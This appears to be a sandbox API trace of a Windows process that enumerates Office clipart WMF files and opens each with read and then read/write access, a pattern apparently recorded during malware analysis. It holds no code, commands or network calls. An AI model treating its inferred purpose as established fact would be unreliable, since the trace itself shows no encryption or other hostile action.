[0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x318, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00372_.WMF", cAlternateFileName="")) returned 1 [0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] AreFileApisANSI () returned 1 [0103.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.899] AreFileApisANSI () returned 1 [0103.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.900] GetFileType (hFile=0x368) returned 0x1 [0103.900] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.900] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.900] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.900] CloseHandle (hObject=0x368) returned 1 [0103.900] AreFileApisANSI () returned 1 [0103.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.900] GetFileType (hFile=0x368) returned 0x1 [0103.901] CloseHandle (hObject=0x368) returned 1 [0103.901] AreFileApisANSI () returned 1 [0103.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.901] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x318)) returned 1 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44b0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00405_.WMF", cAlternateFileName="")) returned 1 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] AreFileApisANSI () returned 1 [0103.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.901] AreFileApisANSI () returned 1 [0103.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.902] GetFileType (hFile=0x368) returned 0x1 [0103.902] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.902] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.902] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.902] CloseHandle (hObject=0x368) returned 1 [0103.902] AreFileApisANSI () returned 1 [0103.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.903] GetFileType (hFile=0x368) returned 0x1 [0103.903] CloseHandle (hObject=0x368) returned 1 [0103.903] AreFileApisANSI () returned 1 [0103.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.903] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44b0)) returned 1 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e94, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00407_.WMF", cAlternateFileName="")) returned 1 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] AreFileApisANSI () returned 1 [0103.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.903] AreFileApisANSI () returned 1 [0103.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.904] GetFileType (hFile=0x368) returned 0x1 [0103.904] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.904] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.904] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.905] CloseHandle (hObject=0x368) returned 1 [0103.905] AreFileApisANSI () returned 1 [0103.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.905] GetFileType (hFile=0x368) returned 0x1 [0103.905] CloseHandle (hObject=0x368) returned 1 [0103.905] AreFileApisANSI () returned 1 [0103.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.905] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd790bed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd790bed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e94)) returned 1 [0103.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.905] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa7f0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00413_.WMF", cAlternateFileName="")) returned 1 [0103.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.905] AreFileApisANSI () returned 1 [0103.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.906] AreFileApisANSI () returned 1 [0103.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.906] GetFileType (hFile=0x368) returned 0x1 [0103.906] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.906] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.906] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.906] CloseHandle (hObject=0x368) returned 1 [0103.907] AreFileApisANSI () returned 1 [0103.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.907] GetFileType (hFile=0x368) returned 0x1 [0103.907] CloseHandle (hObject=0x368) returned 1 [0103.907] AreFileApisANSI () returned 1 [0103.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.907] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa7f0)) returned 1 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa79c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00414_.WMF", cAlternateFileName="")) returned 1 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] AreFileApisANSI () returned 1 [0103.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.907] AreFileApisANSI () returned 1 [0103.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.908] GetFileType (hFile=0x368) returned 0x1 [0103.908] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.908] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.908] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.908] CloseHandle (hObject=0x368) returned 1 [0103.908] AreFileApisANSI () returned 1 [0103.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.909] GetFileType (hFile=0x368) returned 0x1 [0103.909] CloseHandle (hObject=0x368) returned 1 [0103.909] AreFileApisANSI () returned 1 [0103.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.909] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa79c)) returned 1 [0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 